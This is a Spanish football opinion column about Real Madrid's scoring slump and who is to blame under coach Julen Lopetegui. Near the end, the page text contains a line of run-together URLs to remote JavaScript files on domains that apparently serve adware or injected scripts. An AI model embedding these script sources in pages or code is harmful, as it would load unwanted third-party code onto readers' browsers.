¡LOS NUESTROS PRIMERO!

Crisis blanca: ¿Quién realmente tiene la culpa?

madrid091018 (1)

El Real Madrid no tiene gol, ya son 409 minutos sin marcar, perdiendo 3 de los últimos 4 partidos, rescatando solo un empate sin goles en el derbi madrileño y es que en la directiva madridista ya no están tan seguros de que haber dejado huérfanos a la selección española fuera una buena decisión.

Julen Lopetegui fue el elegido para calmar las aguas del Bernabéu, que estaban muy agitadas y en modo tsunami por la marcha del mejor goleador de la historia del club, Cristiano Ronaldo, y del técnico que hizo posible lo imposible, Zinedine Zidane. Estaba claro que nadie podía sustituir ni mejorar lo que había hecho el francés al que solo le faltó conquistar la Copa del Rey, pero el técnico español venía con buen cartel, estaba invicto con la selección española y mostraba carácter y un juego vistoso, algo que hasta ahora no ha podido lograr en la casa blanca.

Su sistema de juego alternado en un 4-3-3 o un 4-4-2 no ha funcionado y es que los blancos dan la sensación de que no saben qué hacer con la pelota en tres cuartos de cancha hacia arriba, mucho toque sin sentido, es lo que reclama la afición, pues en todos los partidos el Madrid ha logrado ser dominante a la hora de obtener la posesión del balón, pero no ha logrado marcar y los partidos se ganan con goles, no con porcentajes de tenencia de la esférica.

Al técnico también se le recrimina el exceso de confianza en jugadores que no dan la talla como es el caso de Isco, Benzema y Ceballos. Cabe destacar que Modric a la fecha ha jugado la mitad del tiempo que disfrutaba con Zidane en esta misma instancia, Casemiro quien era el recuperador nato del mediocampo y parte fundamental de ese Madrid que ganó 3 Champions seguidas, hoy es la primera opción de cambio en los partidos. El hecho es que la mala fortuna y la sombra del pasado hacen que este comienzo de temporada sea alarmante para todos y como es costumbre en este deporte, el culpable es el técnico y si Lopetegui no mejora, Florentino no dudará en despedirlo.

El Bernabéu pita y es cierto que la afición de Madrid es una de las más difíciles e intolerantes del mundo, de memoria corta, exigentes y acostumbrados a ganar como sea. Y es que son muchos los que desean ver al Madrid de antes, vertical y de contrataque, goleador, que se imponía con un sello único, en vez del Madrid de ahora con mucha posesión y poca efectividad.

Son muchos los señalados a parte del técnico, empezando por el Presidente a quien se le atribuye la marcha de Zidane y CR7, la ineficacia a la hora de tomar decisiones y fichar, la afición pedía un jugador de talla mundial para suplir al portugués y en vez de eso llevaron a Mariano, un jugador al que se le considera más normal y poco digno de llevar la 7, un número mítico del club.

Los jugadores no se quedan atrás en este lío y ya han salido algunos perjudicados, como es el caso Benzema, apodado casi gol, es el más señalado por su poco aporte a la ofensiva, Bale no se queda atrás, ya que se esperaba que esta fuese su temporada y saliera de la sombra de Ronaldo, Asensio quien está llamado a ser el heredero, el líder, y esta primera etapa ha estado marcada por su ansiedad, falta de madurez y malas decisiones en jugadas claves.

El plantel está dividido, al parecer los problemas internos son incluso peores de los que el público observa, ya que según medios españoles, los jugadores están divididos en dos grupos, por un lado están los españoles, Sergio Ramos, Carvajal, Asensio, Ceballos y Lucas Vásquez quienes dan el visto bueno al entrenador y piden paciencia y por el otro lado están los extranjeros, quienes dudan de la capacidad del técnico para dirigir al Madrid como es el caso de Modric, Kroos, Varane, Casemiro, Bale y Benzema.

La mala suerte y las lesiones también empañan un comienzo de temporada turbulento, donde incluso ya se manejan nombres para sustituir al español, y se prometen fichajes para mejorar esta versión. Lo cierto es que esta fecha de la Liga de Naciones de la UEFA, ayuda al cuerpo técnico para trabajar y pensar cómo mejorar la situación, Marcelo e Isco ya están trabajando con el equipo y Benzema será baja al menos 3 semanas por lo que se espera que Mariano muestre todo su potencial y aproveche esta oportunidad.

El Real Madrid está a un partido de repetir su peor racha goleadora, la cual fue hace 33 años en la temporada 84/85. Con Amancio en el banquillo los blancos acumularon 5 partidos sin grito de gol.

¿Y para ti quién es el culpable?

Escrito por: Luis Torrealba / @Letc07

Fotos: Cortesía.

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1539091245655http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara